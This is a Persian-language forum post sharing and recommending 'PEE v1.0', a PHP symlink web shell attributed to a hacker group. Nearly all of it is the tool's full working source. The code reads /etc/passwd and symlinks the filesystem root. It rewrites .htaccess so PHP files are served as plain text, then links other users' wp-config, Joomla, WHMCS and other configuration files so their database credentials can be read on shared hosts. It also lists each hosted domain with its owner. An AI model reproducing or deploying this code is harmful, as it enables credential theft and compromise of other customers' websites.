توییت
سلام دوستان. این شلر رو در یکی از انجمن های دوستان دیدم شلر جالبی هستش.
از 5 روش سیم لینک میزنه :
var/named
var/named.conf
etc/passwd
etc/valiases
posix_getpwuid
همچنین با ران کردن شل ، یک فولدر بنام pee ایجاد و کانفیگهای یافت شده در این قسمت ایجاد میگردند.
از 5 روش سیم لینک میزنه :
var/named
var/named.conf
etc/passwd
etc/valiases
posix_getpwuid
همچنین با ران کردن شل ، یک فولدر بنام pee ایجاد و کانفیگهای یافت شده در این قسمت ایجاد میگردند.
کد:
<style type="text/css">
html,body {
margin-top: 5px ;
padding: 0;
outline: 0;
}
body {
direction: ltr;
background-color: #000000;
color: #CCCCCC;
font-family: Tahoma, Arial, sans-serif;
font-weight: bold;
text-align: left ;
}
input,textarea,select{
font-weight: bold;A
color: #FFFFFF;
dashed #ffffff;
border: 1px dotted #003300;
background-color: black;
padding: 3px
}
input:hover{
box-shadow:0px 0px 4px #009900;
}
.cont a
{
text-decoration: none;
color: #FFFFFF;
}
.hedr
{
font-size:32px;
color: #009900;
text-shadow: 0px 0px 4px #003300 ;
}
.td1{
border: 1px dotted #022B04;
padding: 8px;
border-radius: 20px;
text-shadow: 0px 0px 2px #003300;
font-size: 12px;
font-family: Tahoma;
font-weight: bold;
align: center;
}
.td1 tr{}
.lol{
text-align: left;
float: left;
background: #990000;
}
.nop{
width: 300px;
text-align: center;
font-size: 10px;
font-family:Tahoma;
color: #003300;
}
.nop a{
text-decoration: none;
color: #003300 ;
text-shadow: none;
width: 80px;
padding: 8px
}
.nop a:hover{
color: #FFFFFF;
box-shadow: 0px 0px 4px #006600 ;
}
a
{
text-decoration: none;
color: #006600;
}
a:visited {color:#2f4f4f;}
.tmp tr td:hover{
box-shadow: 0px 0px 4px #EEEEEE;
}
.fot{
font-family:Tahoma, Arial, sans-serif;
font-size: 13pt;
}
.ir {
color: #FF0000;
}
.tmp tr td{
border: dotted 1px #003300;
padding: 4px ;
font-size: 14px;
}
.tmp tr td a {
text-decoration: none;
}
.lol a{
font-size: 10px;
}
a:hover {color: red;}
tr:hover,td:hover{background-color: #000000; color:red;}
</style>
<?
####################################################
#####PEE v1.0 ############
#####CODED by taufiquzzaman ############
#####BANGLADESH CYBER ARMY ############
####################################################
set_time_limit(0);
error_reporting(0);
echo '<title>PEE v1.0</title>';
function openBaseDir()
{
$openBaseDir = ini_get("open_basedir");
if (!$openBaseDir)
{
$openBaseDir = '<font color="green">OFF</font>';
}
else
{
$openBaseDir = '<font color="red">ON</font>';
}
return $openBaseDir;
}
echo '
<table width="95%" cellspacing="0" cellpadding="0" class="td1" >
<td height="100" align="left" class="td1">';
$pg = basename(__FILE__);
$safe_mode = @ini_get('safe_mode');
$dir = @getcwd();
echo "Server : <font color=green>".$_SERVER['SERVER_SOFTWARE']."</font><br>";
echo "PHP version : <b><font color=green>".@phpversion()."</font></b><br />";
echo (($safe_mode)?("safe_mode : <b><font color=red>ON</font></b>"):("safe_mode: <b><font color=green>OFF</font></b>"));
echo "<br />disable_functions : ";
if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b><br>";}else{
echo "<font color=red>$df</font></b><br />";
}
echo "Open_Basedir: ".openBaseDir()."<br />";
echo "Pwd : <font color=green><b>".$dir."</font></b><br />";
if(is_readable("/etc/named.conf")){
echo '[ <font color="green">/etc/named.conf</font> ]';
}else{
echo '[ <font color="red">/etc/named.conf</font> ]';
}
if(is_readable("/etc/passwd")){
echo '[ <font color="green">/etc/passwd</font> ]';
}else{
echo '[ <font color="red">/etc/passwd</font> ]';
}
if(is_readable("/etc/valiases")){
echo '[ <font color="green">/etc/valiases exists</font> ]';
}else{
echo '[ <font color="red">/etc/valiases</font> ]';
}
if(is_readable("/var/named")){
echo '[ <font color="green">/var/named</font> ]';
}else{
echo '[ <font color="red">/var/named</font> ]';
}
echo " [ CODED by P-74 ] [<a href='https://www.facebook.com/BDCyberArmy'> BANGLADESH CYBER ARMY <a>]";
echo "</td>";
#########################################################################################################################
#########################################################################################################################
##.htaccess
@mkdir('pee',0777);
@symlink("/","pee/root");
$htaccss = "Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any";
file_put_contents("pee/.htaccess",$htaccss);
$etc = file_get_contents("/etc/passwd");
$etcz = explode("\n",$etc);
##Symlink to the ROOT
foreach($etcz as $etz){
$etcc = explode(":",$etz);
error_reporting(0);
$current_dir = posix_getcwd();
$dir = explode("/",$current_dir);
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php',"pee/".$etcc[0].'-PhpBB.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php',"pee/".$etcc[0].'-vBulletin.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php',"pee/".$etcc[0].'-IPB.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php',"pee/".$etcc[0].'-MyBB.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php',"pee/".$etcc[0].'-SMF.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php',"pee/".$etcc[0].'-Drupal.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php',"pee/".$etcc[0].'-e107.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php',"pee/".$etcc[0].'-Seditio.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php',"pee/".$etcc[0].'-osCommerce.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
}
#####################
##############################################
echo "
<table cellspacing='0' cellpadding='2' style=' margin:15px' class='tb1'>
<tr>
<td rowspan='2' align='center' class='td1' valign='top' >
<div class='nop'>
<font color='red'>CREATE SYMLINK</font><br><br>
<a href='?do=var_named' >BY [ /var/named ]</a><br><br>
<a href='?do=etc_passwd' >BY [ /etc/passwd ]</a><br><br>
<a href='?do=etc_named.conf' >BY [ /etc/named.conf ]</a><br><br>
<a href='?do=etc_valiases' >BY [ /etc/valiases ]</a><br><br>
<a href='?do=posix' >BY [ posix_getpwuid ]</a>
</td></tr></div>
";
##############################################
if(isset($_REQUEST['do'])){
switch ($_REQUEST['do']){
###################################CASE: var_named
case 'var_named':
if(is_readable("/var/named")){
echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
$list = scandir("/var/named");
foreach($list as $domain){
if(strpos($domain,".db")){
$i += 1;
$domain = str_replace('.db','',$domain);
$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><td class='td1'><center><font color='red'>".$owner['name']."</font></center></td><td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
}
}
echo "<center>Total Domains Found: ".$i."</center><br />";
}else{ echo "<tr><td class='td1'>can't read [ /var/named ]</td><tr>"; }
break;
#####################END
###########CASE: /etc/passwd
case 'etc_passwd':
error_reporting(0);
$etc = file_get_contents("/etc/passwd");
$etcz = explode("\n",$etc);
if(is_readable("/etc/passwd")){
echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>SYMLINK</b></center></td>';
$list = scandir("/var/named");
foreach($etcz as $etz){
$etcc = explode(":",$etz);
foreach($list as $domain){
if(strpos($domain,".db")){
$domain = str_replace('.db','',$domain);
$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
if($owner['name'] == $etcc[0])
{
$i += 1;
echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><center><td class='td1'><font color='red'>".$owner['name']."</font></center></td><td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
}}}}
echo "<center>Total Domains Found: ".$i."</center><br />";}
break;
#########################END
########CASE: etc_named.conf
case 'etc_named.conf':
if(is_readable("/etc/named.conf")){
echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
$named = file_get_contents("/etc/named.conf");
preg_match_all('%zone \"(.*)\" {%',$named,$domains);
foreach($domains[1] as $domain){
$domain = trim($domain);
$i += 1;
$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><td class='td1'><center><font color='red'>".$owner['name']."</font></center></td><td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
}
echo "<center>Total Domains Found: ".$i."</center><br />";
} else { echo "<tr><td class='td1'>can't read [ /etc/named.conf ]</td></tr>"; }
break;
##################################END
#############CASE etc_valiases
case 'etc_valiases':
if(is_readable("/etc/valiases")){
echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
$list = scandir("/etc/valiases");
foreach($list as $domain){
$i += 1;
$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><center><td class='td1'><font color='red'>".$owner['name']."</font></center></td><td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
}
echo "<center>Total Domains Found: ".$i."</center><br />";
} else { echo "<tr><td class='td1'>can't read [ /etc/valiases ]</td></tr>"; }
break;
############END
##########CASE posix
case 'posix':
echo <<<PEE
<form method='POST'>
<br><br>Input Limit<br>
<input size='20' value='0' name='min' type='text'>
to
<input size='20' value='1024' name='max' type='text'>
<br>
<input value='SYMLINK' name='' type='submit'><br><br>
</form>
PEE;
if($_POST){
$min = $_POST['min'];
$max = $_POST['max'];
echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
$p = 0;
error_reporting(0);
$list = scandir("/var/named");
for($p = $min; $min <= $max; $p++)
{
$user = posix_getpwuid($p);
if(is_array($user)){
foreach($list as $domain){
if(strpos($domain,".db")){
$domain = str_replace('.db','',$domain);
$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
if($owner['name'] == $user['name'])
{
$i += 1;
echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><center><td class='td1'><font color='red'>".$user['name']."</font></center></td><td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
}
}
}
}
}
echo "<center>Total Domains Found: ".$i."</center><br />";
}
break;
#################END
}
}
##EOF
##7.12.12
##[email protected]
?>
[/align]